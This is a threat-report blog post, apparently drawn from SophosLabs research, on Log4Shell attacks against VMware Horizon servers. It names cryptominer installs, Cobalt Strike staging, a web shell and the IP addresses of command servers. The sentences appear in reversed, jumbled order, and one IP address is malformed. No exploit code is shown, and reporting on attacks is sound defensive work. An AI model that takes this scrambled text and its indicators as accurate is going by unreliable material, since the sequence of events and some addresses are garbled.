![]() The earlier attacks followed this pattern. Infection process VMware -> Tomcat -> Cobalt The most frequently used server in these campaigns is 80.71.158.96. This wave did not rely on Cobalt Strike instead, the cryptominer installer script is directly executed from the Apache Tomcat component of the Horizon server. The largest wave of Log4J attacks aimed at Horizon that we have detected began January 19, and is still ongoing. ![]() Some of these used Cobalt Strike to stage and execute the cryptominer payloads. The next day, the server was changed to 185.112.83.116 this was kept in use for a larger wave of attacks on January 14. ![]() The initial attempts on January 10 came from command and control servers at apirogerscorporg (since sink-holed) and 4532.125.79. The attempts to leverage Horizon, which continued and grew in number throughout January, were frequently associated with attempts to deploy cryptocurrency mining malware others had less clear motives, and may be associated with initial access brokers or ransomware actors. SophosLabs has observed these attacks in customer telemetry since the beginning of January. The attack used the Lightweight Directory Access Protocol resource call of Log4J to retrieve a malicious Java class file that modified existing legitimate Java code, adding a web shell that provided remote access and code execution to the attackers. ![]() In late December 2021 and in January 2022, there were multiple reports of active exploitation of the Log4Shell vulnerability in VMware Horizon servers. One of the products affected was VMware Horizon, a desktop and application virtualization platform that became part of the solution for some organizations’ work-from-home needs prior to and during office shutdowns over the past two years. The vulnerability affected hundreds of software products, making it difficult for some organizations to assess their exposure. In the wake of December 2021 exposure of a remote code execution vulnerability (dubbed “Log4Shell”) in the ubiquitous Log4J Java logging library, we tracked widespread attempts to scan for and exploit the weakness-particularly among cryptocurrency mining bots.
0 Comments
Leave a Reply. |